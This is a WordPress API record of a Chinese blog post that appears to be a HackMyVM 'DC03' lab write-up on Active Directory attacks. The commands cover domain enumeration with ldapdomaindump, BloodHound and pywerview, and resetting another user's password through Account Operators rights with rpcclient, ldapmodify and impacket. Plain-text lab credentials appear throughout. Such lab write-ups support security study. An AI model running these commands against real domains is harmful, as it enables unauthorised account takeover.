{"id":982,"date":"2024-09-03T22:31:48","date_gmt":"2024-09-03T14:31:48","guid":{"rendered":"http:\/\/xiyu12.top\/?p=982"},"modified":"2024-09-03T22:31:48","modified_gmt":"2024-09-03T14:31:48","slug":"hackmyvm-dc03","status":"publish","type":"post","link":"http:\/\/www.xiyu12.top\/?p=982","title":{"rendered":"hackmyvm-dc03"},"content":{"rendered":"\n<h3 class=\"wp-block-heading\">1.<strong>LLMNR<\/strong><\/h3>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u94fe\u8def\u672c\u5730\u591a\u64ad\u540d\u79f0\u89e3\u6790<\/strong>(\u00a0<strong>LLMNR<\/strong>\u00a0) \u662f\u4e00\u79cd\u57fa\u4e8e<a href=\"https:\/\/en.wikipedia.org\/wiki\/Domain_Name_System\">\u57df\u540d\u7cfb\u7edf<\/a>(DNS) \u6570\u636e\u5305\u683c\u5f0f\u7684\u534f\u8bae\uff0c\u5141\u8bb8<a href=\"https:\/\/en.wikipedia.org\/wiki\/IPv4\">IPv4<\/a>\u548c<a href=\"https:\/\/en.wikipedia.org\/wiki\/IPv6\">IPv6<\/a>\u4e3b\u673a\u5bf9\u540c\u4e00\u672c\u5730\u94fe\u8def\u4e0a\u7684\u4e3b\u673a\u6267\u884c\u540d\u79f0\u89e3\u6790\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/09\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-09-03-220735-1024x486.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/09\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-09-03-220735-1024x486.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-983\"\/><\/div><\/figure>\n\n\n\n<h3 
class=\"wp-block-heading\">2.AD \u57df\u7528\u6237\/\u7ec4\u4fe1\u606f\u6536\u96c6<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>ldapdomaindump<\/strong> \u4f7f\u7528 LDAP \u534f\u8bae\u6536\u96c6\u57df\u4fe1\u606f<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">ldapdomaindump soupedecode.local -u 'soupedecode.local\\zximena448' -p 'internet'<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u83b7\u5f97 domain_users.html\u3001domain_groups.html\u3001domain_computers.html<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/09\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-09-03-221117-1024x149.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/09\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-09-03-221117-1024x149.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-985\"\/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>bloodhound <\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f7f\u7528\u65f6\uff0c\u63d0\u793a\u9519\u8bef\uff0cDNS \u670d\u52a1\u5668\u4e0d\u5b58\u5728<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f7f\u7528\u5047\u7684 DNS \u670d\u52a1\u5668\uff1a<a href=\"https:\/\/github.com\/iphelix\/dnschef\">https:\/\/github.com\/iphelix\/dnschef<\/a><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">sudo python3 \/opt\/dnschef\/dnschef.py --fakeip 192.168.130.25<\/p>\n\n\n\n<p
class=\"wp-block-paragraph\">bloodhound-python -c All -u XKATE578 -p jesuschrist -d SOUPEDECODE.LOCAL -ns 127.0.0.1 -dc dc01<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">sudo neo4j start<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">sudo bloodhound<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>pywerview.py<\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">python pywerview.py get-netuser -w soupedecode -u xkate578 -p  jesuschrist  <em>-t  192.168.130.25 --username xkate578<\/em><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/09\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-09-03-222328.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/09\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-09-03-222328.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-986\"\/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">3.Account Operators \u7ec4\u548c\u4fee\u6539\u5bc6\u7801<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Account Operators \u662f\u7cfb\u7edf\u5185\u7f6e\u7ec4\uff0c\u5177\u6709\u4fee\u6539\u666e\u901a\u8d26\u6237\u7684\u5bc6\u7801\u548c\u589e\u52a0\u4e00\u4e2a\u65b0\u7528\u6237\u7684\u6743\u9650\uff0c但不能管理 Administrators、Domain Admins 等受保护组及其成员；由于权限较大，微软建议该组保持为空。<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4fee\u6539\u5bc6\u7801\u7684\u65b9\u6cd5\uff1a<\/p>\n\n\n\n<p
class=\"wp-block-paragraph\">rpcclient <\/p>\n\n\n\n<p class=\"wp-block-paragraph\">rpcclient -U 'XKATE578%jesuschrist' 192.168.130.25<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">lookupnames fbeth103<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">setuserinfo2 fbeth103 23 'P@ssw0rd'<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">ldapmodify\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/09\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-09-03-222916.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/xiyu12.top\/wp-content\/uploads\/2024\/09\/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-09-03-222916.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-987\"\/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>dn: CN=Fanny Beth,CN=Users,DC=soupedecode,DC=local\nchangetype: modify\nreplace: unicodePwd\nunicodePwd:: IgBOAGUAdwBQAGEAcwBzAHcAbwByAGQAIwA1ADIAMgA0AA==\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">ldapmodify -x -D \"CN=Xenia Kate,CN=Users,DC=SOUPEDECODE,DC=LOCAL\" -w \"xxxxx\" -H ldap:\/\/192.168.130.25 -f reset_password.ldif<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">impacket-changepasswd<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">impacket-changepasswd 'soupedecode.local\/fbeth103'@192.168.130.25 -altuser xkate578 -altpass \"jesuschrist\" -newpass fbeth103
-no-pass -reset<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6211\u91cd\u7f6e\u5bc6\u7801\u5931\u8d25\u4e86。需要注意的是，AD 只接受通过加密连接（例如 LDAPS）写入 unicodePwd，而上面的 ldapmodify 使用的是未加密的 ldap:\/\/ 简单绑定，这可能是该方法失败的原因之一。从防守角度看，在启用账户管理审核时，对其他账户的密码重置会在域控上记录事件 4724，可用于监控 Account Operators 成员的此类操作。<\/p>\n","protected":false},"excerpt":{"rendered":"<p>1.LLMNR \u94fe\u8def\u672c\u5730\u591a\u64ad\u540d\u79f0\u89e3\u6790(\u00a0LLMNR\u00a0) \u662f\u4e00\u79cd\u57fa\u4e8e\u57df\u540d\u7cfb\u7edf(DNS) \u6570\u636e\u5305\u683c\u5f0f\u7684\u534f\u8bae\uff0c\u5141\u8bb8I [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4,1,9],"tags":[],"class_list":["post-982","post","type-post","status-publish","format-standard","hentry","category-windows","category-uncategorized","category-target-aircraft"],"_links":{"self":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/982","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=982"}],"version-history":[{"count":0,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/982\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=982"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=982"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=982"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}